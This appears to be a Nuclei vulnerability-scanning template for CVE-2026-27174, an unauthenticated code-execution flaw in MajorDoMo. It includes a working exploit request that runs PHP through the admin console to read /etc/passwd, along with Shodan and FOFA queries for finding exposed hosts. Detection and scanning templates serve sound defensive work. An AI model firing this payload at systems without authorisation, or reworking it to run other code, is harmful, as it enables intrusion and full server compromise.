id: CVE-2026-27174

info:
  name: MajorDoMo - Unauthenticated RCE
  author: 0x_Akoko
  severity: critical
  description: |
    MajorDoMo contains a remote code execution caused by an include order bug and lack of exit after redirect in admin panel's PHP console, letting unauthenticated attackers execute arbitrary PHP code via crafted GET requests.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP code remotely, potentially leading to full system compromise.
  remediation: |
    Update to the latest version with the fix for the include order bug and proper exit after redirect.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-27174
    - https://github.com/sergejey/majordomo/issues/1177
    - https://chocapikk.com/posts/2026/majordomo-revisited
    - https://www.vulncheck.com/advisories/majordomo-unauthenticated-remote-code-execution-via-admin-console-eval
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cvss-score: 10.0
    cve-id: CVE-2026-27174
    epss-score: 0.85411
    epss-percentile: 0.99387
    cwe-id: CWE-94
    cpe: cpe:2.3:a:sergejey:majordomo:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sergejey
    product: majordomo
    fofa-query: body="templates/application.html"
    shodan-query: http.html:"templates/application.html"
  tags: cve,cve2026,rce,majordomo,php,unauth,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body, 'MajordomoSL', 'templates/application.html', 'majordomo')"
        condition: and
        internal: true

  - raw:
      - |
        GET /admin.php?ajax_panel=1&op=console&command=echo+file_get_contents%28%27%2Fetc%2Fpasswd%27%29%3B HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022010c72f96cec44f13c5b0eb7a2ee8cf7b1926b18cb3eac1cf3f15cb7eaeaeac08022100e406479121def7b0ea480de83834ac471529e9ee449345b4e483e8711f33697f:922c64590222798bb761d5b6d8e72950